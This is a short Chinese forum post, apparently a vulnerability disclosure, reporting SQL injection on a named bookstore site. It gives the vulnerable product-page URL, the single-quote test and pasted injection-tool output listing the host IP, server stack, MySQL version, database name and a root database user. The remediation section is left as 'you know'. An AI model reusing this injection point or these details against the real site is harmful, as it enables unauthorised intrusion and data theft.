goback add

100e主站再爆root注入

3373 点击·0 回帖
灯火互联
灯火互联
楼主
http://100e.com/100ebooks/ProductsDetail.asp?MainProductID=2154`加个单引号试试

图片:20121118012103565.jpg





Target:http://100e.com/100ebooks/ProductsDetail.asp?MainProductID=2154
Host IP: 210.51.18.195
web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL error based
Resp. Time(avg): 165 ms
Current User: reader@210.51.18.195
Sql Version: 5.1.41-log
Current DB: 100eDB
System User: reader@210.51.18.195
Host Name: localhost.localdomain
Installation dir: /usr/local/mysql/
DB User ; Pass: root::localhost


竟然是root,就不深入了。



图片:20121118012106815.jpg



修复方案:

你懂的。

喜欢0 评分0
回复

切换至电脑版

Powered by phpwind.me ©2003-2014